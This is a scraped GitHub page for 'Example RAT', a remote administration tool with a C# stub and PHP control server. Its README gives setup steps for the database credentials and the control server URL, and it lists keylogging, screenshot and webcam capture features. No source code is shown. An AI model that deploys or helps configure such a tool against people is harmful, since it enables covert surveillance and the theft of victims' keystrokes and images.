Skip to content

Example RAT is a remote administration tool written in C# for the stub and PHP for the front-end control server.

License

Notifications You must be signed in to change notification settings

x-cod3r/Example-RAT

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Example RAT

This project is for demonstrational purposes only and should not be used maliciously. I am not responsible for any damages that occur from use of this tool.

find this line in all php files and add your credintials and link to database and database name

$db = new mysqli('link to data base here', 'user here','password here', 'data base name here');

in program.cs file line 73 find this line and set url for your control server

   ConnectionIPHandler.IPSet("UrlForYourControlServer");

Example RAT is a remote administration tool written in C# for the stub and PHP for the front-end control server.

simpleAdminFrontEnd simpleAdminAdminPage

Features include: Basic keylogger, desktop screenshot, webcam capture, etc.

About

Example RAT is a remote administration tool written in C# for the stub and PHP for the front-end control server.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C# 71.9%
  • PHP 28.1%